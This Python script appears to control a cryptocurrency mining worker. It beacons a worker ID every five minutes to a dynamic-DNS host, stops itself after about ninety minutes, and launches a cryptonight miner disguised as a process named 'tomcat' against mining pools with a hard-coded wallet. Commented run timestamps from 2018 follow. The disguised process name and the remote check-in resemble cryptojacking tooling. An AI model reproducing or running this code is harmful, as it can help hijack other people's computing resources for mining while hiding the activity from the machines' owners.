import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:52:05.327628
#2018-02-17 16:39:01.643606
#2018-02-17 18:27:06.004249
#2018-02-17 20:16:05.935973
#2018-02-17 22:03:05.083562
#2018-02-17 23:47:01.434707
#2018-02-18 01:38:04.070883
#2018-02-18 03:25:03.163388
#2018-02-18 05:12:05.051415
#2018-02-18 07:04:04.935677
#2018-02-18 08:52:06.037109
#2018-02-18 10:39:06.766612
#2018-02-18 12:24:05.576382
#2018-02-18 14:12:05.499027
#2018-02-18 16:02:03.483836
#2018-02-18 17:52:05.472894
#2018-02-18 19:39:04.934772
#2018-02-18 21:24:03.782901
#2018-02-18 23:13:05.117818
#2018-02-19 00:59:05.958036
#2018-02-19 02:47:06.067287
#2018-02-19 04:33:01.888937
#2018-02-19 06:18:05.084648
#2018-02-19 08:06:01.823896
#2018-02-19 09:56:06.483550
#2018-02-19 11:46:09.136754
#2018-02-19 13:32:04.049213
#2018-02-19 15:22:05.729971
#2018-02-19 17:10:10.153207
#2018-02-19 18:58:08.628996
#2018-02-19 20:44:04.379216
#2018-02-19 22:31:03.780125
#2018-02-20 00:16:08.350096
#2018-02-20 02:04:06.628753
#2018-02-20 03:54:06.188733
#2018-02-20 05:39:04.292957
#2018-02-20 07:24:08.025166
#2018-02-20 09:10:09.530029
#2018-02-20 10:53:07.623913
#2018-02-20 12:41:06.991208
#2018-02-20 14:26:06.892748
#2018-02-20 16:12:13.062505
#2018-02-20 17:59:06.805533
#2018-02-20 19:51:08.027227
#2018-02-20 21:39:08.767102
#2018-02-20 23:22:05.917214
#2018-02-21 01:07:01.426065
#2018-02-21 02:53:07.279961
#2018-02-21 04:42:06.671165
#2018-02-21 06:30:04.992171
#2018-02-21 08:15:07.544577
#2018-02-21 10:02:06.772682
#2018-02-21 11:49:05.364349
#2018-02-21 13:41:04.694922
#2018-02-21 15:24:09.650136
#2018-02-21 17:16:15.006577
#2018-02-21 19:03:07.833257
#2018-02-21 20:51:07.867327
#2018-02-21 22:38:04.187272
#2018-02-22 00:27:01.311596
#2018-02-22 02:14:06.453831
#2018-02-22 04:01:06.933419
#2018-02-22 05:47:04.921669
#2018-02-22 07:34:07.663917
#2018-02-22 09:22:04.101143
#2018-02-22 11:08:09.095408
#2018-02-22 12:56:04.185628
#2018-02-22 14:44:06.474915
#2018-02-22 16:31:10.586421
#2018-02-22 18:18:08.536336
#2018-02-22 20:08:04.748755
#2018-02-22 21:56:07.154094
#2018-02-22 23:43:11.216279
#2018-02-23 01:32:06.106072
#2018-02-23 03:17:06.850267
#2018-02-23 05:03:01.571305
#2018-02-23 06:48:06.153092
#2018-02-23 08:35:01.451611
#2018-02-23 10:49:01.617560
#2018-02-23 12:47:02.189883
#2018-02-23 14:31:07.693714
#2018-02-23 16:22:09.394078
#2018-02-23 18:10:03.583508
#2018-02-23 19:54:06.762341
#2018-02-23 21:39:04.360665
#2018-02-23 23:29:08.221399
#2018-02-24 01:19:05.548298
#2018-02-24 03:11:07.739826
#2018-02-24 04:56:06.968626
#2018-02-24 06:43:05.991766
#2018-02-24 08:33:03.714495
#2018-02-24 10:19:03.909755
#2018-02-24 12:14:01.936071
#2018-02-24 14:02:02.067126
#2018-02-24 15:51:07.521103
#2018-02-24 17:46:04.947976
#2018-02-24 19:33:01.606736
#2018-02-24 21:21:06.225976
#2018-02-25 00:01:05.891476
#2018-02-25 03:17:01.813784
#2018-02-25 07:03:03.999151